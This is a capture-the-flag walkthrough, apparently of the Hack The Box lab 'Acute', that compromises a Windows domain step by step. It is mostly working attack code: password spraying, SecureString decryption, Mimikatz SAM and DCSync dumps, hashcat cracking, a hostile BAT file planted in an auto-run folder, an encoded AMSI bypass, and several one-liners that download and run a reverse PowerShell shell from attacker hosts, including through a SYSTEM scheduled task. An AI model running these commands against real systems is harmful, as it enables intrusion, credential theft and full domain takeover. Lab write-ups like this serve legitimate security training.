Enumeration

nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 07:55 IST
Nmap scan report for 10.129.136.40 (10.129.136.40)
Host is up (0.080s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-07-04T02:43:16+00:00; +15m23s from scanner time.
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 15m22s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.00 seconds

1. A web server at TCP/443 is detected.
2. On browsing through the website, a document is found at https://atsserver.acute.local/New_Starter_CheckList_v7.docx (on About Page)

Document

1. The document is an Induction Checklist for New Starters. It is a standard set of schedule to follow while onboarding new employees.

   

2. Under the details for the activity IT Overview, it is mentioned that some users don’t change the default password Password1!.

3. The document also points to a remote training link: https://atsserver.acute.local/Acute_Staff_Access

4. The link redirects to a Windows PowerShell Web Access Console.

   

5. The metadata of document shows the origin computer : Acute-PC01

   

Initial Access

1. 3 variables are required by PSWA to authenticate to a valid powershell session on a computer in the network.

2. Password is found in the document. Computer Name from the metadata of the document. Only a valid username is unknown.

3. From the user that created the document, the company uses the <FIRST LETTER OF FIRSTNAME><Last Name> as policy for creating usernames.

4. A list of employees is available on the About page on the website.

   

5. A list of usernames is created using this information:

   Aileen Wallace
   Charlotte Hall
   Evan Davies
   Ieuan Monks
   Joshua Morgan
   Lois Hopkins
   AWallace
   CHall
   EDavies
   IMonks
   JMorgan
   LHopkins
   Aileen
   Charlotte
   Evan
   Ieuan
   Joshua
   Lois
   

6. After fuzzing/bruteforcing the Acute\<Username>:Password1! credentials to connect to Acute-PC01, a valid set of credentials is found. Acute\EDavies:Password1!

   

User Access

1. With privileges of EDavies, a winPeas enumeration is performed.

2. A user writeable path that is under AV Exclusions is listed. C:\Utils

   

3. Querying for active RDP sessions using query user on PSWA session, it is found that the user edavies has a active console session. The output for that session can be captured using meterpreter session.

   

4. The user Acute\EDavies, is found to be using credentials of Acute\IMonks to execute commands on ATSSERVER, which is the Domain Controller for the domain ACUTE.LOCAL using configuration dc_manage. (As also mentioned in the word document). The credentials are: Acute\IMonks:W3_4R3_th3_f0rce.

5. A command execution is achieved using these credentials and configuration dc_session.

   $username = "Acute\imonks"
   $password = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
   $credentials = New-Object System.Management.Automation.PSCredential($username, $password)
      
   Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {whoami}
   

6. The PSWA doesn’t allow to execute commands in such manner due to issues of hopping. This can be bypassed by using Invoke-ReverseShellTcp.ps1 and getting a raw reverse powershell session.

   iex(iwr http://my.ip.addr.ess/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowershellTcp -Reverse -IPAddress my.ip.addr.ess -Port ListnerPort
   

   

   

7. The remote Powershell Session configuration dc_manage is limited in capabilities. This can be analogous to Shell Jail.

   

Privilege Escalation

Escaping Powershell Jail

1. The powershell jail has following commands available for the user Acute\imonks:

   1. Get-Alias
   2. **Get-ChildItem** (ls for directories)
   3. Get-Command
   4. Get-Content (Reads content from a file)
   5. Get-Location
   6. Set-Content (Write into a new file or overwrite existing)
   7. Set-Location
   8. Write-Output

2. Apart from these, basic aliases also work ls, cat, cd

3. Enumerating further, a powershell script is found in the Desktop Folder for the user imonks. Contents of the powershell script:

   Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credentials -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}
   $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
   $passwd = $securepasswd | ConvertTo-SecureString
   $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
   Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
   

4. This powershell script is using credentials for Acute\jmorgan to execute commands on Acute-PC01. The user Acute\jmorgan is a member of the Local Administrators group on Acute-PC01.

5. We can modify the script using Set-Content command available to imonks

6. The password in the script is a SecureString format of password, which then can be converted to EncryptedString to be used for creating a PSCredential object to be used with various commands.

7. This post from StackOverflow describes how to convert such SecureStrings into plain text password. The condition is, the secure strings cannot be converted into plaintext password on any other machine. By setting the contents of wm.ps1 to following, the Plain-Text password can be achieved.

   $securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" ; $passwd = $securepasswd | ConvertTo-SecureString ; $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) ; $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($passwd) ; $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr); [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) ; $result
   

8. The password can be recovered following commands in order:

   Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{Set-Content C:\Users\imonks\Desktop\wm.ps1 '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" ; $passwd = $securepasswd | ConvertTo-SecureString ; $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) ; $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($passwd) ; $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr); [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) ; $result'}
      
   Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}
   # !T5_0nly_y4_{f4c3}
      
   

   

9. Credentials for Acute\jmorgan are obtained. Acute\jmorgan:!T5_0nly_y4_{f4c3}

10. The commands can be executed on Acute-PC01 using the same method of Invoke-Command with PSCredential Object and ComputeName as Acute-PC01.

    $username = "Acute\jmorgan"
    $password = ConvertTo-SecureString -AsPlainText -Force "!T5_0nly_y4_{f4c3}"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
    Invoke-Command -ComputerName Acute-PC01 -Credential $credential -ScriptBlock {whoami}
    

    

11. The user Edavies can be now added to Local Administrator Group on Acute-PC01 to escalate session and dump SAM hashes from the machine.

    net.exe localgroup Administrators Acute\edavies /add
    

    

12. Apart from this, a full powershell session can also be achieved for the user imonks on ATSServer which can be useful for Active Directory and Basic Enumeration. This can be done by setting the content of wm.ps1 as following:

    powershell -ep bypass -enc aQBlAHgAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAxADoANwAwADcAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQB1AHMAZQBiAGEAcwBpAGMAcABhAHIAcwBpAG4AZwApADsAIABpAGUAeAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAyADEAOgA3ADAANwAwAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACkAOwAgAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAgAC0AUgBlAHYAZQByAHMAZQAgAC0ASQBQAEEAZABkAHIAZQBzAHMAIAAxADAALgAxADAALgAxADQALgAyADEAIAAtAFAAbwByAHQAIAA5ADAAOQAwAA==
        
    # iex(iwr http://my-web-server.local/amsi-bypass.ps1 -usebasicparsing); iex(iwr http://my-web-server.local/Invoke-PowerShellTcp.ps1 -usebasicparsing); Invoke-PowerShellTcp -Reverse -IPAddress local-machine -Port 9090
    

13. Following commands will spawn an unrestricted reverse powershell.

    $username = "Acute\imonks"
    $password = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
    $credentials = New-Object System.Management.Automation.PSCredential($username, $password)
        
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -ScriptBlock {Set-Content C:\Users\imonks\Desktop\wm.ps1 'powershell -ep bypass -enc aQBlAHgAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAxADoANwAwADcAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQB1AHMAZQBiAGEAcwBpAGMAcABhAHIAcwBpAG4AZwApADsAIABpAGUAeAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAyADEAOgA3ADAANwAwAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACkAOwAgAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAgAC0AUgBlAHYAZQByAHMAZQAgAC0ASQBQAEEAZABkAHIAZQBzAHMAIAAxADAALgAxADAALgAxADQALgAyADEAIAAtAFAAbwByAHQAIAA5ADAAOQAwAA=='} -Credential $credentials
        
    Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}
        
    

    

Dumping SAM Hashes and Password Spray

1. After adding Acute\EDavies to the Administrators group, the session has to be relaunched for new privileges to take effect.

2. After the relaunch, privileges can be checked by using whoami /priv command.

   

3. Mimikatz can be then downloaded into the excluded directory C:\Utils and executed for dumping SAM hashes.

   .\mimikatz.exe "token::elevate" "lsadump::sam" "exit" | Out-File -FilePath .\SAMDump.txt -Encoding utf8
   

   

   

4. The NTLM hash for the user Administrator was cracked using hashcat.

   .\hashcat.exe -m 1000 -a 0 -O Y:\Documents\HTB\Acute\samhash.hash G:\Wordlists\rockyou.txt
      
   # a29f7623fd11550def0192de9246f46b:Password@123
   

5. This password can be tried to spray against remaining users on ATSSERVER:

   1. Acute\AWallace
   2. Acute\CHall
   3. Acute\LHopkins

6. The password worked with Acute\AWallace account.

   $username = "Acute\AWallace"
   $password = ConvertTo-SecureString -AsPlainText -Force "Password@123"
   $credential = New-Object System.Management.Automation.PSCredential($username, $password)
      
   Invoke-Command -ComputerName ATSSERVER -Credential $credential -Configuration dc_manage -ScriptBlock {whoami}
      
   

   

Active Directory Enumeration and Looking Around on Domain Controller

1. Going back to unrestricted powershell session of imonks, it can be leveraged to perform AD Enumeration and Windows Enumeration using BloodHound, winpeas, and PowerView.ps1.

2. On quick enumeration and AD mapping using Bloodhound, it is found that domain group Site_Admin is a member of Domain Admins Group. SID: S-1-5-21-1786406921-1914792807-2072761762-2102

3. The footer of the Word Document says the following:

   **Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **

4. According to this, the user Acute\LHopkins has permissions to add members to domain group. This can be confirmed by checking ACLs that Acute\LHopkins hold on Domain Objects.

   # From PowerView.ps1
   # LHopkins SID : S-1-5-21-1786406921-1914792807-2072761762-1109
   # Site_Admin SID : S-1-5-21-1786406921-1914792807-2072761762-2102
      
   Get-DomainObjectACL -resolveGuids | ?{$_.ObjectSID -like "<Site_admin SID>"} | ?{$_.SecurityIdentifier -like "<LHopkins SID>"}
   

   

5. This confirms that Acute\LHopkins has GenericAll DACL that can allow the user full control on the domain object, which is the Site_Admin group here.

6. On further enumeration, an odd folder is found in C:\Program Files folder, named keepmeon. “Keep Me On”. The user Acute\imonks doesn’t have permission to see the contents of the folder C:\Program Files\keepmeon

   

7. But the user Acute\AWallace has permissions for the same operation.

   

8. There’s a single BAT in the directory. The content of the BAT files are:

   REM This is run every 5 minutes. For Lois use ONLY
   @echo off
    for /R %%x in (*.bat) do (
    if not "%%x" == "%~0" call "%%x"
   )
   

9. The bat file runs any .bat files present in the same folder, and it is run by Lhopkins user every 5 minutes. This is a perfect place to drop a malicious BAT file and add one of the earlier compromised user in Site_Admin group.

net.exe group Site_admin "edavies" /add /domain # To attack from Acute-PC01
net.exe group Site_admin "imonks" /add /domain # To attack on Domain Controller

Exploitation

1. The exploit can be achieved using following commands:

   $username = "Acute\AWallace"
   $password = ConvertTo-SecureString -AsPlainText -Force "Password@123"
   $credential = New-Object System.Management.Automation.PSCredential($username, $password)
      
   Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {Set-Content "C:\Program Files\keepmeon\actual_update00.bat" 'net.exe group Site_admin "edavies" /add /domain'}
      
   Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {Set-Content "C:\Program Files\keepmeon\actual_update01.bat" 'net.exe group Site_admin "imonks" /add /domain'}
      
   

2. After placing files, the execution might happen immediately or in a few minutes since that depends on the time of last execution. It executes every five minutes.

3. On execution, the member is/are successfully added to the Site_Admin domain group.

   

4. The members of Domain Admins group can now perform DCSync attacks using either mimikatz.exe or Invoke-Mimikatz,ps1

   Invoke-Mimikatz -Command '"lsadump::dcsync /patch /all /domain:acute.local" "exit"' | Out-File -FilePath dcsync.txt
   

   

5. To escalate privileges to NT Authority\System, a task can be scheduled and run on the domain controler..

   schtasks /create /S atsserver.acute.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (iwr http://dropzone.local/amsi-bypass.ps1 -usebasicparsing); iex (iwr http://dropzone.local/Invoke-PowerShellTcp.ps1 -usebasicparsing); Invoke-PowerShellTcp -Reverse -IpAddress 10.10.14.21 -Port 9092'"
   schtasks /Run /S atsserver.acute.local /TN "STCheck"
   

   

The remote domain is now completely compromised.